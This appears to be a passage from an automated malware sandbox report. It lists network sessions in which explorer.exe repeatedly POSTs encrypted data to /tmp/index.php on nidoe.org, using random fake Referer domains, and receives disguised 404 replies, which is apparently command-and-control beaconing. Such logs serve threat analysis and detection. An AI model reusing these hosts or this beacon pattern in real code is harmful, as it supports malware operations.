3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  9192.168.2.549720119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:47:35.150964975 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ylocvbbjhcotul.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 363
                  Host: nidoe.org
                  Apr 26, 2024 11:47:35.151002884 CEST363OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2a 34 ad b9
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA -[k,vu*4{irc`NT:;&^2ZwBOMpl!EZ2HpC[sM~R}YSRAh*=PX^r!:Ka
                  Apr 26, 2024 11:47:36.358182907 CEST510INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:47:36 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  10192.168.2.549722119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:43.367328882 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lyvgfxwmddcnfb.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 338
                  Host: nidoe.org
                  Apr 26, 2024 11:48:43.367362976 CEST338OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 29 f1 bd
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuC)P4@AO5s@dnu7v:#<cJf9*[X\@!!="h-{C~F|KOoU1+1
                  Apr 26, 2024 11:48:44.553025007 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:44 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.549723119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:44.986284971 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://qipuwsetjdsly.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 146
                  Host: nidoe.org
                  Apr 26, 2024 11:48:44.986316919 CEST146OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 43 ab 99
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuyCH$pBN|L?."rUnKhB;k#:i%
                  Apr 26, 2024 11:48:46.168170929 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:45 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.549724119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:46.715630054 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://sitrlilwixmijdwa.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 285
                  Host: nidoe.org
                  Apr 26, 2024 11:48:46.715683937 CEST285OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 25 c5 bd
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu|%JUYD{1JXamqcSc-ZA,H_IMDR@nnP&%Povnz]sH%+1zg5<y{o{WK
                  Apr 26, 2024 11:48:47.913717985 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:47 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.549725119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:48.305830002 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lkfxkpohfrqcuf.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 151
                  Host: nidoe.org
                  Apr 26, 2024 11:48:48.305830956 CEST151OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 47 4f a7 9d
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuGOF`z0!My<"Jm36U&YL)Z!>4,'L
                  Apr 26, 2024 11:48:49.475702047 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:49 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.549726119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:50.067756891 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ymaqoerhmbiko.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 179
                  Host: nidoe.org
                  Apr 26, 2024 11:48:50.067790985 CEST179OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4f 2c b5 8a
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuO,wBg$R1;MG`m]y>IZ70%ufg"DIq?Y
                  Apr 26, 2024 11:48:51.259509087 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:50 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.549727119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:53.977641106 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://lifcehnnpyaunk.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 328
                  Host: nidoe.org
                  Apr 26, 2024 11:48:53.977664948 CEST328OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3e 32 e8 ab
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu>2h1BBZ[*f$G$V@`h[L@@(@W_<.{KD+(K]I&2R>f+Ae*AamQ-
                  Apr 26, 2024 11:48:55.158829927 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:54 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.549728119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:55.896378040 CEST281OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://bmvswhlxjuxjpf.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 302
                  Host: nidoe.org
                  Apr 26, 2024 11:48:55.896392107 CEST302OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 60 35 c1 81
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu`5Z*E1Zr$'=h1kbjW:-&DM@NN~#ZQkqe%|q[15-&~ T`uE6h
                  Apr 26, 2024 11:48:57.080249071 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:56 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.549729119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:48:57.550009012 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://chqvujyrjfo.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 358
                  Host: nidoe.org
                  Apr 26, 2024 11:48:57.550569057 CEST358OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 21 ca b8
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuq!ae]V6V_M/oc(TX P.,c:W:J8=b<I}Kq,t@5 9cQyuzMqAiuqlUEw
                  Apr 26, 2024 11:48:58.732377052 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:48:58 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.549730119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:00.896944046 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://jldhvcofgpoohdqq.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 114
                  Host: nidoe.org
                  Apr 26, 2024 11:49:00.896979094 CEST114OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3f 37 a5 9a
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu?7vDkq46~"9zP
                  Apr 26, 2024 11:49:02.087163925 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:01 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.549731119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:05.885668993 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://dpmkxcqjquv.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 135
                  Host: nidoe.org
                  Apr 26, 2024 11:49:05.885682106 CEST135OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 45 e4 ae
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu!ELDnO2QS<@i|hcM?[ S*Q
                  Apr 26, 2024 11:49:07.073163986 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:06 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.549732119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:12.723020077 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://vxtsdxtdlktwbdnl.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 301
                  Host: nidoe.org
                  Apr 26, 2024 11:49:12.723020077 CEST301OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 58 2f ad fe
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuX/CgQ[gV^E){8i.VH\,^#nRYb<C(pyi4E$]V*kf!85BBZpxVNu6|x55s
                  Apr 26, 2024 11:49:13.929617882 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:13 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.549733119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:18.365467072 CEST279OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://abowpkrstiub.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 295
                  Host: nidoe.org
                  Apr 26, 2024 11:49:18.365525007 CEST295OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 49 c6 92
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuCI_f}x0zfgd#(#(4(>*"RD#hyO_(Bl#uaOJA(wSIk4*`u)s:$p
                  Apr 26, 2024 11:49:19.557686090 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:19 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.549734119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:23.641505003 CEST280OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://tboygovgxqdbv.org/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 147
                  Host: nidoe.org
                  Apr 26, 2024 11:49:23.641547918 CEST147OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 07 bb 8a
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu2jz^7;ZbGXrwOv3A:b*]B
                  Apr 26, 2024 11:49:24.831507921 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:24 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.549735119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:30.712687016 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://ovkuafudign.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 147
                  Host: nidoe.org
                  Apr 26, 2024 11:49:30.712704897 CEST147OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 55 c9 89
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vuqUY,_[rqpDY0:(MMWZT[U&cj
                  Apr 26, 2024 11:49:31.674782991 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:31 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.549736119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:35.592735052 CEST278OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://xbqpttmfpoa.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 269
                  Host: nidoe.org
                  Apr 26, 2024 11:49:35.592763901 CEST269OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 39 d4 90
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu^9gWedn]^Km:B+2T@!]HI?C%bbOY_51CJ'|b0X@l&#0vh^vi")}
                  Apr 26, 2024 11:49:36.786492109 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:36 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.549737119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:40.768532991 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://rskpmxlavjxbjtbs.com/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 116
                  Host: nidoe.org
                  Apr 26, 2024 11:49:40.768552065 CEST116OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 3e c8 af
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu1>QWPM1Q$]Y
                  Apr 26, 2024 11:49:41.952558041 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:41 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.549738119.204.11.2801028C:\Windows\explorer.exe
                  TimestampBytes transferredDirectionData
                  Apr 26, 2024 11:49:47.864492893 CEST283OUTPOST /tmp/index.php HTTP/1.1
                  Connection: Keep-Alive
                  Content-Type: application/x-www-form-urlencoded
                  Accept: */*
                  Referer: http://hphdpqnonfmpdqxq.net/
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                  Content-Length: 198
                  Host: nidoe.org
                  Apr 26, 2024 11:49:47.864531994 CEST198OUTData Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 27 e3 e6
                  Data Ascii: ;nVh$p{w}uf~E* uQk?#1|J7 M@NA .[k,vu#'xEoYA[&iwwm)vn7T8f#M=tsvQjQiS-r9Q
                  Apr 26, 2024 11:49:49.062968016 CEST177INHTTP/1.1 404 Not Found
                  Server: nginx/1.24.0
                  Date: Fri, 26 Apr 2024 09:49:48 GMT
                  Content-Type: text/html; charset=utf-8
                  Connection: close
                  X-Powered-By: PHP/7.4.33
                  Data Raw: 03 00 00 00 72 e8 84
                  Data Ascii: r


